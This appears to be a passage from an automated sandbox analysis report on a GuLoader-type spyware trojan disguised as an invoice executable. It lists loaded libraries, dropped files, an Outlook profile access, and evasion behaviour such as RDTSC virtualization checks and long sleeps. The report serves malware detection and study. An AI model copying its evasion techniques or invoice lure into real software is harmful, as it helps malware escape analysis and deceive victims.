Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7B350 4_2_3AD7B350
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD79D70 4_2_3AD79D70
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7CF70 4_2_3AD7CF70
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD71360 4_2_3AD71360
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD73360 4_2_3AD73360
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7AD10 4_2_3AD7AD10
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7DF10 4_2_3AD7DF10
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD70508 4_2_3AD70508
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD7C930 4_2_3AD7C930
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AD79730 4_2_3AD79730
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB1B50 4_2_3ADB1B50
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB3008 4_2_3ADB3008
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB36F0 4_2_3ADB36F0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB1470 4_2_3ADB1470
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB2920 4_2_3ADB2920
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB0D88 4_2_3ADB0D88
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB2238 4_2_3ADB2238
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB1B3F 4_2_3ADB1B3F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB36E1 4_2_3ADB36E1
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB1460 4_2_3ADB1460
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB0A10 4_2_3ADB0A10
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB09E1 4_2_3ADB09E1
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB2911 4_2_3ADB2911
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB2FFB 4_2_3ADB2FFB
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB0D79 4_2_3ADB0D79
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB2229 4_2_3ADB2229
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB0040 4_2_3ADB0040
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3ADB0011 4_2_3ADB0011
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AEA3BD0 4_2_3AEA3BD0
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AEA9771 4_2_3AEA9771
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AEA0F74 4_2_3AEA0F74
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_3AEA2530 4_2_3AEA2530
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: String function: 00402B3A appears 51 times
Sample file is different than original file name gathered from version info
Source: Factura Honorarios 2024-10.exe, 00000004.00000002.3011954740.0000000037897000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: OriginalFilenameUNKNOWN_FILET vs Factura Honorarios 2024-10.exe
Uses 32bit PE files
Source: Factura Honorarios 2024-10.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@3/10@5/5
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_00404457 GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_00404457
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_0040206A LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk, 0_2_0040206A
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File created: C:\Program Files (x86)\shaw Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\gunrack Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Mutant created: NULL
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File created: C:\Users\user\AppData\Local\Temp\nsr45A1.tmp Jump to behavior
Source: Factura Honorarios 2024-10.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: Factura Honorarios 2024-10.exe ReversingLabs: Detection: 47%
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File read: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe "C:\Users\user\Desktop\Factura Honorarios 2024-10.exe"
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process created: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe "C:\Users\user\Desktop\Factura Honorarios 2024-10.exe"
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process created: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe "C:\Users\user\Desktop\Factura Honorarios 2024-10.exe" Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 00000004.00000002.2985431621.0000000001862000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2291538822.00000000053B2000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_004060E1 GetModuleHandleA,LoadLibraryA,GetProcAddress, 0_2_004060E1
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 0_2_10002DA0 push eax; ret 0_2_10002DCE
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Code function: 4_2_00169C30 push esp; retf 0019h 4_2_00169D55
Drops PE files
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe File created: C:\Users\user\AppData\Local\Temp\nsn497A.tmp\System.dll Jump to dropped file
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Switches to a custom stack to bypass stack traces
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe API/Special instruction interceptor: Address: 5C66B5F
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe API/Special instruction interceptor: Address: 2116B5F
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe RDTSC instruction interceptor: First address: 5C2AF82 second address: 5C2AF82 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007EFC050C3965h 0x00000008 test ah, FFFFFF9Eh 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe RDTSC instruction interceptor: First address: 20DAF82 second address: 20DAF82 instructions: 0x00000000 rdtsc 0x00000002 cmp ch, ah 0x00000004 cmp ebx, ecx 0x00000006 jc 00007EFC0480B975h 0x00000008 test ah, FFFFFF9Eh 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
Allocates memory with a write watch (potentially for evading sandboxes)
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Memory allocated: 120000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Memory allocated: 379A0000 memory reserve | memory write watch Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Memory allocated: 376B0000 memory reserve | memory write watch Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 600000 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599875 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599722 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599578 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599469 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599344 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599235 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 599110 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598985 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598860 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598735 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598610 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598485 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598359 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598250 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598141 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 598032 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597907 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597782 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597669 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597562 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597263 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597153 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 597047 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596938 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596828 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596719 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596610 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596485 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596360 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596235 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 596110 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595985 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595860 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595735 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595610 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595485 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595360 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595235 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 595110 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594985 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594860 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594735 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594610 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594485 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594360 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594235 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 594110 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 593985 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 593860 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Thread delayed: delay time: 593735 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Window / User API: threadDelayed 1732 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Window / User API: threadDelayed 8085 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsn497A.tmp\System.dll Jump to dropped file
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe API coverage: 1.7 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep count: 35 > 30 Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -32281802128991695s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 1804 Thread sleep time: -600000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\Factura Honorarios 2024-10.exe TID: 4136 Thread sleep count: 1732 > 30 Jump to behavior
